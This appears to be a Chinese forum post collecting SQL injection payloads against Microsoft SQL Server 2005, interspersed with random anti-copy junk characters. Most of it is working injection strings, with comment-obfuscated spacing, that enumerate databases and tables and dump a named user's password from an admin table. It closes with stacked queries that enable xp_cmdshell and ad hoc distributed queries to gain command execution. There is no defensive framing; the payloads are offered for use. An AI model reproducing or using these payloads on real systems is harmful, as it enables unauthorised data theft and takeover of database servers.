MSsql2005注入语句

admin

4 b" w$ a" u1 @. i# |* @% `
9 U- G3 {; w  [1 Z' O
$ j. F$ J# M* e  B& ~[Copy to clipboard]CODE:
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--

. V) w3 v( \/ f7 L1 ]爆表语句,somedb部份是所要列的数据库，红色数字1累加


[Copy to clipboard]CODE:
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--

( A1 L" _+ q! V" ?. D* o爆字段语句，爆表admin里user='icerover'的密码段
+ W/ @: ~0 d/ {5 ~, g$ X+ H' Q& Q

[Copy to clipboard]CODE:
/ L0 B$ x4 }4 v7 k8 P**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--

+ x# F" r& L) s: T" }" v) xmssql2005默认没有开xp_cmdshell的，openrowset也不能用
如果是sa权限，可以这样来开启
( E8 @! O- @& ?6 C9 F6 _0 O. Z开启openrowset


[Copy to clipboard]CODE:
6 \! v6 F* K3 }# z( y/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
% _6 G! O4 u; `4 E8 F7 S& a
开启xp_cmdshell
1 Y0 M8 B8 S: i. a' S' o& A

% w3 K& P' |9 S  P( v) X- a[Copy to clipboard]CODE:
' t6 C+ Y, ^  n  l4 @% Y5 yEXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--

ok,over~~晚安
6 t5 l1 H4 C6 G4 H1 l+ s8 ]# w' c